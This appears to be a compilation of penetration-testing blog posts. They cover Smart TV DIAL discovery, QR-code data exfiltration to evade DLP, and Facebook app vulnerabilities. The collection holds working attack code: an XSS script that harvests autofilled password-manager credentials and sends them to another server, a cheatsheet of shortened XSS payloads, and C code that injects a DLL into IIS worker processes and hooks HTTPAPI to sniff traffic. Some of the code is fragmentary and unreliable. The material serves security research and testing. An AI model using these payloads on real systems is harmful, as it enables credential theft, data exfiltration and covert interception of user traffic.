Smart TV + Smartphone = Shiny New Attack Surfaces

According to a Gartner report from December 2012, “85 percent of all flat-panel TVs will be Internet-connected Smart TVs by 2016.” Forbes magazine gives some analysis about what is fueling this trend: , The article makes a mention of “DIAL”, an enabling technology for second-screen features (which this post is about).  With these new devices come new risks as evidenced in the following article: , as well as more recent research about Smart TV risks presented at the CanSecWest and DefCon security conference this year (2013).

For more details about about exactly what features a Smart TV has above and beyond a normal television, consult this WikiPedia article:

This post introduces and describes aspects of “DIAL”, a protocol developed by Google and Netflix for controlling Smart TVs with smart phones and tablets.  DIAL provides “second screen” features, which allow users to watch videos and other content on a TV using a smart phone or tablet. This article will review sample code for network discovery and enumerate Smart TV apps using this protocol.

Part 1: Discovery and Enumeration

Smart TVs are similar to other modern devices in that they have apps. Smart TVs normally ship with an app for YouTube(tm), Netflix(tm), as well as many other built-in apps. If you have a smartphone, then maybe you’ve noticed that when your smartphone and TV are on the same network, a small square icon appears in some mobile apps, allowing you to play videos on the big TV. This allows you to control the TV apps from your smartphone. Using this setup, the TV is a “first screen” device, and the phone or tablet functions as a “second screen”, controlling the first screen.

DIAL is the network protocol used for these features and is a standard developed jointly between Google and Netflix.  (See ).  DIAL stands for “Discovery and Launch”. This sounds vaguely similar to other network protocols, namely “RPC” (remote procedure call). Basically, DIAL gives devices a way to quickly locate specified networked devices (TVs) and controlling programs (apps) on those devices.

Let’s take a look at the YouTube mobile application to see how exactly this magic happens. Launching the YouTube mobile app with a Smart TV on network (turned on of course) shows the magic square indicating a DIAL-enabled screen is available:

Magic TV Square

Square appears when YouTube app finds TVs on the network.

Clicking the square provides a selection menu where the user may choose which screen to play YouTube videos. Recent versions of the YouTube apps allow “one touch pairing” which makes all of the setup easy for the user:


Let’s examine the traffic generated by the YouTube mobile app at launch.

  • The Youtube mobile app send an initial SSDP request, to discover available first-screen devices on the network.
  • The sent packet is destined for a multicast address ( on UDP port 1900. Multicast is useful because devices on the local subnet can listen for it, even though it is not specifically sent to them.
  • The YouTube app multicast packet contains the string “urn:dial-multiscreen-org:service:dial:1”. A Smart TV will respond to this request, telling YouTube mobile app its network address and information about how to access it.

A broadcast search request from the YouTube mobile app looks like this:

11:22:33.361831 IP my_phone.41742 > UDP, length 125
0x0010: .......l..+;M-SE
0x0020: ARCH.*.HTTP/1.1.
0x0030: .HOST:.239.255.2
0x0040: 55.250:1900..MAN
0x0050: :."ssdp:discover
0x0060: "..MX:.1..ST:.ur
0x0070: n:dial-multiscre
0x0080: en-org:service:d
0x0090: ial:1....

Of course, the YouTube app isn’t the only program that can discover ready-to-use Smart TVs. The following is a DIAL discoverer in a few lines of python. It waits 5 seconds for responses from listening TVs. (Note: the request sent in this script is minimal. The DIAL protocol specification has a full request packet example.)

! /usr/bin/env python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("ST: urn:dial-multiscreen-org:service:dial:1",("",1900))
while 1:
    data,addr = s.recvfrom(1024)
    print "[*] response from %s:%d" % addr
    print data
  except socket.timeout:

A response from a listening Smart TV on the network looks like:

[*] response from
HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
SERVER: Linux/2.6 UPnP/1.0 quick_ssdp/1.0
ST: urn:dial-multiscreen-org:service:dial:1
USN: uuid:bcb36992-2281-12e4-8000-006b9e40ad7d::urn:dial-multiscreen-org:service:dial:1

Notice that the TV returns a LOCATION header, with a URL: . The response from reading that URL leads to yet another URL which provides the “apps” link on the TV.

HTTP/1.1 200 OK
Content-Type: application/xml
<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0" xmlns:r="urn:restful-tv-org:schemas:upnp-dd”> <specVersion> <major>1</major> <minor>0</minor> </specVersion>
<device> <deviceType>urn:schemas-upnp-org:device:tvdevice:1</deviceType> <friendlyName>Vizio DTV</friendlyName> <manufacturer>Vizio Inc.</manufacturer> <modelName>Vizio_E420i_A0</modelName>
<UDN>uuid:bcb36992-2281-12e4-8000-006b9e40ad7d M-SEARCH * HTTP/1.1
MAN: "ssdp:discover"
MX: 3
ST: urn:schemas-upnp-org:device:MediaServer:1

At this point, the YouTube mobile app will try to access the “apps” URL combined with the application name with a GET request to: http::// . A positive response indicates the application is available, and returns an XML document detailing some data about the application state and feature support:

HTTP/1.1 200 OK
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<service xmlns="urn:dial-multiscreen-org:schemas:dial">
<options allowStop="false"/>

Those of you who have been following along may have noticed how easy this has been. So far, we have sent one UDP packet and issued two GET requests. This has netted us:

  • The IP address of a Smart TV
  • The Operating system of a Smart TV (Linux 2.6)
  • Two listening web services on random high ports.
  • A RESTful control interface to the TV’s YouTube application.

If only all networked applications/attack surfaces could be discovered this easily. What should we do next? Let’s make a scanner. After getting the current list of all registered application names (as of Sept 18, 2013)  from the DIAL website, it is straightforward to create a quick and dirty scanner to find the apps on a Smart TV:

#! /usr/bin/env python
# Enumerate apps on a SmartTV
# <>
import urllib2
import sys
'Twonky TV','Turner-TNT-Leverage','Turner-TBS-BBT','Turner-NBA-GameTime',
'org.enlearn.Copilot','frequency', 'PlayMovies' ]
  url = sys.argv[1]
  print "Usage: %s tv_apps_url" % sys.argv[0]

for app in apps:
    u = urllib2.urlopen("%s/%s"%(url,app))
    print "%s:%s" % ( app, repr(str(u.headers) )

Some of those app names appear pretty interesting. (Note to self: Find all corresponding apps.) The scanner looks for URLs returning positive responses (200 result codes and some XML), and prints them out:

 $ ./ 

YouTube:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>YouTube</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'

Netflix:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>Netflix</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'

Hopefully this article has been informative for those who may be looking for new devices and attack surfaces to investigate during application or penetration testing.


DLP Circumvention: A Demonstration of Futility

By Ben Toews

TLDR: Check out the tool

I can’t say that I’m an expert in Data Loss Prevention (DLP), but I imagine its hard. The basic premise is to prevent employees or others from getting data out of a controlled environment, for example, trying to prevent the DBA from stealing everyone’s credit card numbers or the researcher from walking out the door with millions in trade secrets. DLP is even tougher in light of new techniques for moving confidential data undetected through a network.  When I demonstrated how I could do it with QR Codes, I had to rethink DLP protections.

Some quick research informs me that the main techniques for implementing DLP are to monitor and restrict access to data both physically and from networking and endpoint perspectives. Physical controls might consist of putting locks on USB ports or putting an extra locked door between your sensitive environment and the rest of the world. Networking controls might consist of firewalls, IDS, content filtering proxies, or maybe just unplugging the sensitive network from the rest of the network and the internet.

Many security folks joke about the futility of this effort. It seems that a determined individual can always find a way around these mechanisms. To demonstrate, my co-worker, Scott Behrens, was working on a Python script to convert files to a series of QR Codes (2d bar codes) that could be played as a video file. This video could then be recorded and decoded by a cell-phone camera and and stored as files on another computer. However, it seemed to me that with the new JavaScript/HTML5 file APIs, all the work of creating the QR Code videos could be done in the browser, avoiding the need to download a Python script/interpreter.

I was talking with a former co-worker, about this idea and he went off and wrote a HTML5/JS encoder and a ffmpeg/bash/ruby decoder that seemed to work pretty well. Not wanting to be outdone, I kept going and wrote my own encoder and decoder.

My encoder is fairly simple. It uses the file API to read in multiple files from the computer, uses Stuart Knightley’s JSZip library to create a single ZIP file, and then Kazuhiko Arase’s JavaScript QRCode Generator to convert this file into a series of QRCodes. It does this all in the browser without requiring the user to download any programs or transmit any would-be-controlled data over the network.

The decoder was a little bit less straight-forward. I have been wanting to learn about OpenCV for a non-security related side project, so I decided to use it for this. It turns out that it is not very entirely easy to use and its documentation is somewhat lacking. Still, I persevered and wrote a Python tool to:

  1. Pull images from the video and analyze their color.
  2. Identify the spaces between frames of QRCodes (identified by a solid color image).
  3. Pull the QRCode frames between these marker frames.
  4. Feed them into a ZBar ImageScanner and get the data out.

The tool seems to work pretty well. Between my crummy cellphone camera and some mystery frames that ZBar refuses to decode, it isn’t the most reliable tool for data transfer, but is serves to make a point. Feel free to download both the encoder and decoder from my GitHub Repo or checkout the live demo and let me know what you think. I haven’t done any benchmarking for data bandwidth, but it seems reasonable to use the tool for files several megabytes in size.

To speak briefly about preventing the use of tools like this for getting data of your network: As with most things in security, finding a balance between usability and security is the key. The extreme on the end of usability would be to keep an entirely open network without any controls to prevent or detect data loss. The opposite extreme would be to unplug all your computers and shred their hard drives. Considerations in finding the medium as it relates to DLP include:

  • The value of your data to your organization.
  • The value of your data to your adversaries.
  • The means of your organization to implement security mechanisms.
  • The means of your adversaries to defeat security mechanisms.

Once your organization has decided what its security posture should be, it can attempt to mitigate risk accordingly. What risk remains must be accepted. For most organizations, the risk presented by a tool like the one described above is acceptable. That being said, techniques for mitigating its risk might include:

  • Disallowing video capture devices in sensitive areas (already common practice in some organizations).
  • Writing IDS signatures for the JavaScript used to generate the QRCodes (this is hard because JS is easily obfuscated and packed).
  • Limiting access within your organization to sensitive information.
  • Trying to prevent the QRCode-creating portion of the tool from reaching your computers.
    • Physical Protections (USB port locks, removing CD Drives, etc.)
    • Network Protections (segmentation,content filtering, etc.)

Good luck ;)

Apparently the word ‘QR Code’ is registered trademark of DENSO WAVE INCORPORATED

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst case scenario with this type of attack would be that there is no confirmation for email address or password changes and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By reseting the password, the attacker is giving away his presence and the extent to which he is able to masquarade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third party password managers such as LastPass are also capable of generating strong, application specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong application specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly any attention is how these can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page aswell as a second page that is vulnerable to XSS (find them here). I then proceded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none'
            request=new XMLHttpRequest();
            url = ""+ex_username+"&password="+ex_password;
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    inter = window.setInterval("attack()",100);

All that this code does it create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to and login (username:user1 password:secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert  box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While these both may be inconveniences from a usability perspective, they (inadvertantly or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use push state to trick a user into thinking that they were on the login page.

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if  you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg. <script src=''>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src=''>
  • You don’t need quotes around your src attribute. Eg. <script src=></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script></script>. Thats still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. Eg. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at 14 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes it at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your your browser or go to

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.

<title>xss example</title>
//my awesome js
function a(){alert(1)}

<!– XSS Injected here –>
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!– End XSS Injection –>

<h1>XSS ROCKS</h1>
<p>click me</p>
<input value=’try typing in here’>

PS: I did some Googling before writing this. Thanks to those at and at gnarlysec.

Facebook Applications Have Nagging Vulnerabilities

By Neohapsis Researchers Andy Hoernecke and Scott Behrens

This is the second post in our Social Networking series. (Read the first one here.)

As Facebook’s application platform has become more popular, the composition of applications has evolved. While early applications seemed to focus on either social gaming or extending the capabilities of Facebook, now Facebook is being utilized as a platform by major companies to foster interaction with their customers in a variety forms such as sweepstakes, promotions, shopping, and more.

And why not?  We’ve all heard the numbers: Facebook has 800 million active users, 50% of whom log on everyday. On average, more than 20 million Facebook applications are installed by users every day, while more than 7 million applications and websites remain integrated with Facebook. (1)  Additionally, Facebook is seen as a treasure trove of valuable data accessible to anyone who can get enough “Likes” on their page or application.

As corporate investments in social applications have grown, Neohapsis Labs researchers have been requested to help clients assess these applications and help determine what type of risk exposure their release may pose. We took a sample of the applications we have assessed and pulled together some interesting trends. For context, most of these applications are very small in size (2-4 dynamic pages.)  The functionality contained in these applications ranged from simple sweepstakes entry forms and contests with content submission (photos, essays, videos, etc.) to gaming and shopping applications.

From our sample, we found that on average the applications assessed had vulnerabilities in 2.5 vulnerability classes (e.g. Cross Site Scripting or SQL Injection,) and none of the applications were completely free of vulnerabilities. Given the attack surface of these applications is so small, this is a somewhat surprising statistic.

The most commonly identified findings in our sample group of applications included Cross-Site Scripting, Insufficient Transport Layer Protection, and Insecure File Upload vulnerabilities. Each of these vulnerabilities classes will be discussed below, along with how the social networking aspect of the applications affects their potential impact.

Facebook applications suffer the most from Cross-Site Scripting. This type of vulnerability was identified on 46% of the applications sampled.  This is not surprising, since this age old problem still creeps up into many corporate and personal applications today.  An application discovered to be vulnerable to XSS could be used to attempt browser based exploits or to steal session cookies (but only in the context of the application’s domain.)

These types of applications are generally framed inline [inling framing, or iframing, is a common HTML technique for framing media content] on a Facebook page from the developer’s own servers/domain. This alleviates some of the risk to the user’s Facebook account since the JavaScript can’t access Facebook’s session cookies.  And even if it could, Facebook does use HttpOnly flags to prevent JavaScript from accessing session cookies values.  But, we have found that companies have a tendency to utilize the same domain name repeatedly for these applications since generally the real URL is never really visible to the end user. This means that if one application has a XSS vulnerability, it could present a risk to any other applications hosted at the same domain.

When third-party developers enter the picture all this becomes even more of a concern, since two clients’ applications may be sharing the same domain and thus be in some ways reliant on the security of the other client’s application.

The second most commonly identified vulnerability, affecting 37% of the sample, was Insufficient Transport Layer Protection While it is a common myth that conducting a man-in-the-middle attack against cleartext protocols is impossibly difficult, the truth is it’s relatively simple.  Tools such as Firesheep aid in this process, allowing an attacker to create custom JavaScript handlers to capture and replay the right session cookies.  About an hour after downloading Firesheep and looking at examples, we wrote a custom handler for an application that was being assessed that only used SSL when submitting login information.   On an unprotected WIFI network, as soon as the application sent any information over HTTP we had valid session cookies, which were easily replayed to compromise that victim’s session.

Once again, the impact of this finding really depends on the functionality of the application, but the wide variety of applications on Facebook does provide a interesting and varied landscape for the attacker to choose from.  We only flagged this vulnerability under specific circumstance where either the application cookies were somehow important (for example being used to identify a logged in session) or the application included functionality where sensitive data (such as PII or credit card data) was transmitted.

The third most commonly identified finding was Insecure File Upload. To us, this was surprising, since it’s generally not considered to be one of the most commonly identified vulnerabilities across all web applications. Nevertheless 27% of our sample included this type of vulnerability. We attribute its identification rate to the prevalence of social applications that include some type of file upload functionality (to share an avatar, photo, document, movie, etc.)

We found that many of the applications we assessed have their file upload functionality implemented in an insecure way.  Most of the applications did not check content type headers or even file extensions.  Although none of the vulnerabilities discovered led to command injection flaws, almost every vulnerability exploited allowed the attacker to upload JavaScript, HTML or other potentially malicious files such as PDF and executables.  Depending on the domain name affected by this vulnerability, this flaw would aid in the attacker’s social engineering effort as the attacker now has malicious files on a trusted domain.

Our assessment also identified a wide range of other types of vulnerabilities. For example, we found several of these applications to be utilizing publicly available admin interfaces with guessable credentials. Furthermore, at least one of the admin interfaces was riddled with stored XSS vulnerabilities. Sever configurations were also a frequent problem with unnecessary exposed services and insecure configuration being repeatedly identified.

Finally, we also found that many of these web applications had some interesting issues that are generally unlikely to affect a standard web application. For example, social applications with a contest component may need to worry about the integrity of the contest. If it is possible for a malicious user to game the contest (for example by cheating at a social game and placing a fake high score) this could reflect badly on the application, the contest, and the sponsoring brand.

Even though development of applications integrated with Facebook and other social network sites in increasing, we’ve found companies still tend to handle these outside of their normal security processes. It is important to realize that these applications can present a risk and should be thoroughly examined just like traditional stand alone web applications.

Bad Plugins, Vulnerabilities, and Facebook for a Triage of Social Engineering Win

Over the course of the last few months I have worked with clients that are tightly intertwined with Facebook through the use of third party plugins.  These plugins are used by the clients’ customer base for sharing links on their walls, entering promotions, and extending the functionality of the Facebook experience.   These third party applications are just as vulnerable as any other web application, but they have a different platform than a traditional web application, as they are tied directly into Facebook.

This leads to a few interesting opportunities for the attacker who may discover a flaw in one of these applications.  For one, there is an inherent trust in the applications on a Facebook page.  When a user on Facebook adds an application to their profile and it is a company that they view favorably, the thought of security might not cross their mind.  An attacker can use this to their advantage, especially in the context of social engineering, to potentially exploit a weakness in this plugin and have a higher success rate of exploitation.   In addition, many websites make use of Facebook’s share.php function, which parses a website and allows a user to share a link on their wall to the material.   This sharing function can also uniquely be exploited in the event that the third party plugin or site has an open redirect vulnerability.

Open redirection is an interesting vulnerability that simply redirects a user from a seemingly trusted site to an un-trusted site.   As a client side attack, Facebook would be an excellent medium for conducting this type of attack.  On a recent engagement, I came across a mobile website that was tightly integrated into Facebook.  Products and services offered by this company could be shared to Facebook, the non-mobile site had 50,000 or so “likes” on Facebook and even had an associated plugin.  The mobile site was vulnerable to open redirection on every single request.  The website took a base64 encoded URL of the non-mobile site and redirected every request to that URL (reformatted with some JavaScript).   I pulled the HTML and Stylesheets for the product I was interested in sharing, base64 encoded my malicious webserver hosting this content, and let the Facebook share.php function parse the site.  The link pasted to Facebook looked identical to the original and also contained the URL of the trusted site.  After a user clicks the product link shared on Facebook, they are redirected to my site, and client side JavaScript exploits are run.

Why is this particularly interesting?  I could send the same link to users over email.  The interesting part is that the link looks legitimate and Facebook even parses the link’s content to add to its legitimacy.  In addition, if I have already built rapport with people who like this particular client’s products and services, this also assists in the potential effectiveness of this attack.

So to help mitigate this risk, ensure your third party plugins are assessed in the same degree as your web applications.  If you are a company that allows employees to use Facebook, ensure users are educated on the risk of using Facebook and the plugins that tie into the site.

Facebook in the last few months has really ramped up their security efforts by offering a Bug Bounty program.  The program adheres to the principle of responsible disclosure and has been relatively successful as numerous bugs and fixes have been implemented.  Unfortunately, third-party plugins are excluded from this program, and since tens of thousands of third party applications integrate into Facebook, this presents many opportunities for the curious attacker.   It would be nice to see Facebook allow third-party developers to opt into this bug bounty program, but in the mean time it is a step in the right direction.

ThotCon 0x01

For those who haven’t heard Greg Ose and I will be presenting at the first annual ThotCon on April 23 in Chicago. If you haven’t gotten your ticket yet you will need to hurry as they are almost gone. Our talk is called Forensic Fail: Malware Kombat and will cover some of the failings of digital forensics. We also have a surprise lined up for the end so if you are in the area you won’t want to miss it.

You can register for the conference at We hope to see you there.

Unprivileged Sniffing

The standard attack path against a hardened system almost invariably involves escalating privileges locally. Privileged access allows the attacker to do things like access all data on the server, sniff network traffic, and install root kits or other privileged malware. Typically, one of the goals of host hardening is to limit the damage that an attacker can do who has gained access to an unprivileged account. “Successfully” hardening a web server, for example, involves preventing the account used by the httpd service/server from modifying the source code of the application it hosts.

Imagine a web server that handles sensitive information, let’s say credit card numbers. This application runs through an interpreter invoked by a web server running as an unprivileged user. No matter how this data is encrypted when at rest, if it can be decrypted by the application, an attacker with the ability to invoke an arbitrary process at the same privilege level as this application will be able to recover the data. This is not true however of data which is stored as a hash or encrypted using an asymmetric public key where the private key is not present. In these cases an attacker is often forced to escalate local privileges to sniff data in transit either via network sniffing, or modifying encryption libraries. Even when data is stored in a retrievable format, especially on hardened systems, recovering this ultimately obfuscated data can be a daunting task for an attacker. Many applications now employ a multi-tiered approach which requires a significant amount of time and effort to attack and gain access to the critical keys or algorithms.

Given the architecture of Windows servers however, it is possible, via access to an unprivileged account such as Local Server, to implement a form of unprivileged sniffer which will monitor sensitive information as it is passed through the target application. This can be implemented in a way which would allow an attacker to trivially monitor all data in motion through the application. In the case of a web application this would include any parameters within a request, data returned by the server, or even headers like those used for basic authentication. This method is generic across applications and can be used to sniff encrypted connections.

The unprivileged sniffer doesn’t employ any tactics that are strictly new and although we haven’t seen this implemented in malware to date it wouldn’t be surprising if something similar has been done. The implementation I will describe is effective against IIS 6 but similar things could be implemented for other applications (SQL Server and Apache come to mind).

The first challenge in hooking into an IIS worker process or Application Pool (w3wp.exe) is knowing when it will start. A request coming into IIS is handled by the W3SVC service and passed off to an Application Pool via a named pipe. The service will either instantiate a new worker process passing the pipe name as an argument or assign the connection to an existing worker. The difficulty is that as the “Local Server” user we can not hook into the W3SVC itself so we must either constantly watch for new instantiations of ‘w3wp.exe’ or have some way of knowing when they start. By monitoring named pipes using the undocumented API ‘NtQueryDirectoryFile’ we can watch for the creation of pipes that start with ‘iisipm’. A pipe will be created each time a new worker is initialized giving us a head start hooking the new process.

Now that we know a process will be created we can do a standard library injection using code similar to the following to identify it and inject our sniffer. In this code LIBNAME represents the name of the DLL to inject.


HANDLE snapshot;




LPVOID LoadLibAddr, RemoteName;

/* Find the PID of the “w3wp.exe” process. */

entry.dwSize = sizeof(PROCESSENTRY32);

if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, (unsigned long)NULL)) != INVALID_HANDLE_VALUE) {

for (r = Process32First(snapshot, &entry); r; r = Process32Next(snapshot, &entry)) {

if (strstr(entry.szExeFile, “w3wp.exe”)) {

TargetPID = entry.th32ProcessID;





if (!TargetPID) return;

/* Open the process */


/* Get the address of “LoadLibraryA” to use as our remote thread procedure */

if ((LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandleA(“kernel32.dll”), “LoadLibraryA”)) == NULL) goto out;

/* Allocate a block of memory within “w3wp.exe” to hold the name of the DLL we are injecting and copy it in */

if ((RemoteName = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(LIBNAME) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)) == NULL) goto out;

if (!WriteProcessMemory(Proc, (void *)RemoteName, LIBNAME, strlen(LIBNAME) + 1, NULL)) goto out;

/* Create a thread within “w3wp.exe” which will load our DLL into memory */

CreateRemoteThread(Proc, NULL, (unsigned long)NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (void *)RemoteName, (unsigned long)NULL, NULL)



We now have our library loaded into the address space of the worker process. When this occurs the entry point of our library will be called. We will use the concept of a trampoline to hook certain calls within the w3wp process. Specifically IIS uses a library called HTTPAPI for passing around HTTP requests and responses. By hooking into the following calls we can examine requests and responses passed through this worker.

  • HttpReceiveHttpRequest
  • HttpReceiveRequestEntityBody
  • HttpSendHttpResponse
  • HttpSendResonseEntityBody

As an example the following stub shows one way of hooking ‘HttpReceiveHttpRequest’.

/* This will store the address of the HttpReceiveHttpRequest function */


HttpReceiveHttpRequestType HttpReceiveHttpRequestSaved;

/* The trampoline structure is used to save both the original 6 bytes of the function we are hooking and the new instructions we replace them with */

typedef struct _trampoline {

char push;

void *func;

char ret;

} Tramp, *PTramp;

Tramp HRHR, oldHRHR;



/* Ensure that HTTPAPI.dll has been loaded */

lib = LoadLibraryA(“HTTPAPI.dll”);

/* Save the address of “HttpReceiveHttpRequest” */

HttpReceiveHttpRequestSaved = (HttpReceiveHttpRequestType)GetProcAddress(lib, “HttpReceiveHttpRequest”);

/* 0x68 is the x86 PUSH instruction */

HRHR.push = 0x68;

/* We are pushing the address of our hook */

HRHR.func = (HttpReceiveHttpRequestType *)&HttpReceiveHttpRequestHook;

/* 0xC3 is the x86 RETN instruction which will pop the value we just pushed and jump to that location. This effectively hijacks the flow of execution */

HRHR.ret = 0xC3;

/* We then read the original 6 bytes of the HttpReceiveHttpRequest function */

ReadProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* And replace it with our trampoline code */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

We have now replaced the first six bytes of the ‘HttpReceiveHttpRequest’ function mapped within the ‘w3wp.exe’ process to redirect the flow of execution into our hook procedure. Now by creating a hook we can sniff any data passed through this function by implementing code similar to the following.

